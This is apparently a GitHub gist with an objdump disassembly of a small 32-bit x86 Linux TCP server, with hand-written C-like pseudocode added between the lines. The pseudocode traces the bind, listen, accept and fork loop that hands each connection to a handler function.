8048c3a: 8d 84 24 cc 00 00 00 lea 0xcc(%esp),%eax
8048c41: 89 04 24 mov %eax,(%esp)
8048c44: e8 d7 fa ff ff call 8048720 <memset@plt>
8048c49: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp)
8048c50: 00
8048c51: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048c58: 00
8048c59: 8d 84 24 dc 00 00 00 lea 0xdc(%esp),%eax
8048c60: 89 04 24 mov %eax,(%esp)
8048c63: e8 b8 fa ff ff call 8048720 <memset@plt>
8048c68: 66 c7 84 24 cc 00 00 movw $0x2,0xcc(%esp)
8048c6f: 00 02 00
8048c72: 8b 44 24 30 mov 0x30(%esp),%eax
8048c76: 0f b7 c0 movzwl %ax,%eax
8048c79: 89 04 24 mov %eax,(%esp)
8048c7c: e8 ef f9 ff ff call 8048670 <htons@plt>
8048c81: 66 89 84 24 ce 00 00 mov %ax,0xce(%esp)
8048c88: 00
8048c89: c7 84 24 d0 00 00 00 movl $0x0,0xd0(%esp)
8048c90: 00 00 00 00
8048c94: c7 44 24 2c 01 00 00 movl $0x1,0x2c(%esp)
8048c9b: 00
8048c9c: c7 44 24 10 04 00 00 movl $0x4,0x10(%esp)
8048ca3: 00
8048ca4: 8d 44 24 2c lea 0x2c(%esp),%eax
8048ca8: 89 44 24 0c mov %eax,0xc(%esp)
8048cac: c7 44 24 08 02 00 00 movl $0x2,0x8(%esp)
8048cb3: 00
8048cb4: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048cbb: 00
8048cbc: 8b 44 24 34 mov 0x34(%esp),%eax
8048cc0: 89 04 24 mov %eax,(%esp)
8048cc3: e8 58 f9 ff ff call 8048620 <setsockopt@plt>
8048cc8: 85 c0 test %eax,%eax
8048cca: 74 2f je 8048cfb <send@plt+0x54b>
8048ccc: a1 7c b0 04 08 mov 0x804b07c,%eax
8048cd1: 89 44 24 0c mov %eax,0xc(%esp)
8048cd5: c7 44 24 08 1c 00 00 movl $0x1c,0x8(%esp)
8048cdc: 00
8048cdd: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048ce4: 00
8048ce5: c7 04 24 a1 8f 04 08 movl $0x8048fa1,(%esp)
8048cec: e8 9f f9 ff ff call 8048690 <fwrite@plt>
8048cf1: b8 ff ff ff ff mov $0xffffffff,%eax
8048cf6: e9 5d 01 00 00 jmp 8048e58 <send@plt+0x6a8>
8048cfb: 8b 44 24 28 mov 0x28(%esp),%eax
8048cff: 89 44 24 08 mov %eax,0x8(%esp)
8048d03: 8d 84 24 cc 00 00 00 lea 0xcc(%esp),%eax
8048d0a: 89 44 24 04 mov %eax,0x4(%esp)
8048d0e: 8b 44 24 34 mov 0x34(%esp),%eax
8048d12: 89 04 24 mov %eax,(%esp)
8048d15: e8 e6 f9 ff ff call 8048700 <bind@plt>
8048d1a: 83 f8 ff cmp $0xffffffff,%eax
8048d1d: 75 2f jne 8048d4e <send@plt+0x59e>
8048d1f: a1 7c b0 04 08 mov 0x804b07c,%eax
8048d24: 89 44 24 0c mov %eax,0xc(%esp)
8048d28: c7 44 24 08 17 00 00 movl $0x17,0x8(%esp)
8048d2f: 00
8048d30: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048d37: 00
8048d38: c7 04 24 be 8f 04 08 movl $0x8048fbe,(%esp)
8048d3f: e8 4c f9 ff ff call 8048690 <fwrite@plt>
8048d44: b8 ff ff ff ff mov $0xffffffff,%eax
8048d49: e9 0a 01 00 00 jmp 8048e58 <send@plt+0x6a8>
8048d4e: c7 44 24 04 80 00 00 movl $0x80,0x4(%esp)
8048d55: 00
8048d56: 8b 44 24 34 mov 0x34(%esp),%eax
8048d5a: 89 04 24 mov %eax,(%esp)
8048d5d: e8 de f9 ff ff call 8048740 <listen@plt>
8048d62: 83 f8 ff cmp $0xffffffff,%eax
8048d65: 75 2f jne 8048d96 <send@plt+0x5e6>
8048d67: a1 7c b0 04 08 mov 0x804b07c,%eax
8048d6c: 89 44 24 0c mov %eax,0xc(%esp)
8048d70: c7 44 24 08 1b 00 00 movl $0x1b,0x8(%esp)
8048d77: 00
8048d78: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048d7f: 00
8048d80: c7 04 24 d6 8f 04 08 movl $0x8048fd6,(%esp)
8048d87: e8 04 f9 ff ff call 8048690 <fwrite@plt>
8048d8c: b8 ff ff ff ff mov $0xffffffff,%eax
8048d91: e9 c2 00 00 00 jmp 8048e58 <send@plt+0x6a8>
while(true) {
8048d96: 8d 44 24 28 lea 0x28(%esp),%eax
8048d9a: 89 44 24 08 mov %eax,0x8(%esp)
8048d9e: 8d 84 24 dc 00 00 00 lea 0xdc(%esp),%eax
8048da5: 89 44 24 04 mov %eax,0x4(%esp)
8048da9: 8b 44 24 34 mov 0x34(%esp),%eax
8048dad: 89 04 24 mov %eax,(%esp)
8048db0: e8 cb f8 ff ff call 8048680 <accept@plt>
8048db5: 89 44 24 38 mov %eax,0x38(%esp)
8048db9: 83 7c 24 38 ff cmpl $0xffffffff,0x38(%esp)
8048dbe: 75 28 jne 8048de8 <send@plt+0x638>
8048dc0: a1 7c b0 04 08 mov 0x804b07c,%eax
8048dc5: 89 44 24 0c mov %eax,0xc(%esp)
8048dc9: c7 44 24 08 28 00 00 movl $0x28,0x8(%esp)
8048dd0: 00
8048dd1: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048dd8: 00
8048dd9: c7 04 24 f4 8f 04 08 movl $0x8048ff4,(%esp)
8048de0: e8 ab f8 ff ff call 8048690 <fwrite@plt>
8048de5: 90 nop
8048de6: eb ae jmp 8048d96 <send@plt+0x5e6>
8048de8: 8b 84 24 e0 00 00 00 mov 0xe0(%esp),%eax
8048def: 89 04 24 mov %eax,(%esp)
8048df2: e8 59 f8 ff ff call 8048650 <inet_ntoa@plt>
8048df7: 89 44 24 04 mov %eax,0x4(%esp)
8048dfb: c7 04 24 1d 90 04 08 movl $0x804901d,(%esp)
8048e02: e8 39 f8 ff ff call 8048640 <printf@plt>
8048e07: e8 24 f9 ff ff call 8048730 <fork@plt>
8048e0c: 89 44 24 3c mov %eax,0x3c(%esp)
esp_3ch = fork();
8048e10: 83 7c 24 3c 00 cmpl $0x0,0x3c(%esp)
8048e15: 75 30 jne 8048e47 <send@plt+0x697>
if(esp_3ch == 0) {
8048e17: 8b 44 24 38 mov 0x38(%esp),%eax
8048e1b: 89 04 24 mov %eax,(%esp)
8048e1e: e8 5c fc ff ff call 8048a7f <send@plt+0x2cf>
sub_8048a7f(esp_38h);
8048e23: 8b 44 24 38 mov 0x38(%esp),%eax
8048e27: 89 04 24 mov %eax,(%esp)
8048e2a: e8 71 f9 ff ff call 80487a0 <close@plt>
close(esp_38h);
8048e2f: 8b 44 24 34 mov 0x34(%esp),%eax
8048e33: 89 04 24 mov %eax,(%esp)
8048e36: e8 65 f9 ff ff call 80487a0 <close@plt>
close(esp_34h);
8048e3b: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048e42: e8 89 f8 ff ff call 80486d0 <exit@plt>
exit(EXIT_SUCCESS);
}
8048e47: 8b 44 24 38 mov 0x38(%esp),%eax
8048e4b: 89 04 24 mov %eax,(%esp)
8048e4e: e8 4d f9 ff ff call 80487a0 <close@plt>
close(esp_38h);
8048e53: e9 3e ff ff ff jmp 8048d96 <send@plt+0x5e6>
}
8048e58: 8b 94 24 ec 00 00 00 mov 0xec(%esp),%edx
8048e5f: 65 33 15 14 00 00 00 xor %gs:0x14,%edx
8048e66: 74 05 je 8048e6d <send@plt+0x6bd>
8048e68: e8 f3 f7 ff ff call 8048660 <__stack_chk_fail@plt>
8048e6d: c9 leave
8048e6e: c3 ret
}
8048e6f: 90 nop
8048e70: 55 push %ebp
8048e71: 57 push %edi
8048e72: 31 ff xor %edi,%edi
8048e74: 56 push %esi
8048e75: 53 push %ebx
8048e76: e8 75 f9 ff ff call 80487f0 <send@plt+0x40>
8048e7b: 81 c3 85 21 00 00 add $0x2185,%ebx
8048e81: 83 ec 1c sub $0x1c,%esp
8048e84: 8b 6c 24 30 mov 0x30(%esp),%ebp
8048e88: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi
8048e8e: e8 59 f7 ff ff call 80485ec <setsockopt@plt-0x34>
8048e93: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax
8048e99: 29 c6 sub %eax,%esi
8048e9b: c1 fe 02 sar $0x2,%esi
8048e9e: 85 f6 test %esi,%esi
8048ea0: 74 27 je 8048ec9 <send@plt+0x719>
8048ea2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048ea8: 8b 44 24 38 mov 0x38(%esp),%eax
8048eac: 89 2c 24 mov %ebp,(%esp)
8048eaf: 89 44 24 08 mov %eax,0x8(%esp)
8048eb3: 8b 44 24 34 mov 0x34(%esp),%eax
8048eb7: 89 44 24 04 mov %eax,0x4(%esp)
8048ebb: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4)
8048ec2: 83 c7 01 add $0x1,%edi
8048ec5: 39 f7 cmp %esi,%edi
8048ec7: 75 df jne 8048ea8 <send@plt+0x6f8>
8048ec9: 83 c4 1c add $0x1c,%esp
8048ecc: 5b pop %ebx
8048ecd: 5e pop %esi
8048ece: 5f pop %edi
8048ecf: 5d pop %ebp
8048ed0: c3 ret
8048ed1: eb 0d jmp 8048ee0 <send@plt+0x730>
8048ed3: 90 nop
8048ed4: 90 nop
8048ed5: 90 nop
8048ed6: 90 nop
8048ed7: 90 nop
8048ed8: 90 nop
8048ed9: 90 nop
8048eda: 90 nop
8048edb: 90 nop
8048edc: 90 nop
8048edd: 90 nop
8048ede: 90 nop
8048edf: 90 nop
8048ee0: f3 c3 repz ret
Disassembly of section .fini:
08048ee4 <.fini>:
8048ee4: 53 push %ebx
8048ee5: 83 ec 08 sub $0x8,%esp
8048ee8: e8 03 f9 ff ff call 80487f0 <send@plt+0x40>
8048eed: 81 c3 13 21 00 00 add $0x2113,%ebx
8048ef3: 83 c4 08 add $0x8,%esp
8048ef6: 5b pop %ebx
8048ef7: c3 ret
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment